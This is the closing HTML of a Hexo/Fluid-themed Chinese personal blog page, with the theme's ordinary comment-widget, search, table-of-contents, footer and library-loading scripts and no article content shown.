        var options = {"repo":"HorizonChaser/horizonchaser.github.io","repo-id":"MDEwOlJlcG9zaXRvcnkzMDM2OTkwNDY=","category":"Announcements","category-id":"DIC_kwDOEhoUZs4CVpcM","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span> <script> var now = new Date(); function createtime() { var grt = new Date("10/14/2020 17:38:00"); now.setTime(now.getTime() + 250); days = (now - grt) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); hours = (now - grt) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); if (String(hnum).length == 1) { hnum = "0" + hnum; } minutes = (now - grt) / 1000 / 60 - (24 * 60 * dnum) - (60 * hnum); mnum = Math.floor(minutes); if (String(mnum).length == 1) { mnum = "0" + mnum; } seconds = (now - grt) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); snum = Math.round(seconds); if (String(snum).length == 1) { snum = "0" + snum; } document.getElementById("timeDate").innerHTML = "Horizon Blog 已经运行 " + dnum + " 天 "; document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒 \n"; } setInterval("createtime()", 250); </script> <br/>
<span id="powererxxx">Powered by Horizon, </span> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo, </span></a> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid, and </span></a> <i class="iconfont icon-love"></i> <span id="lovefromX">from everyone of you!</span> <p><center><a href="https://icp.gov.moe/?keyword=20243141" target="_blank">萌ICP备20243141号</a></center></p> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
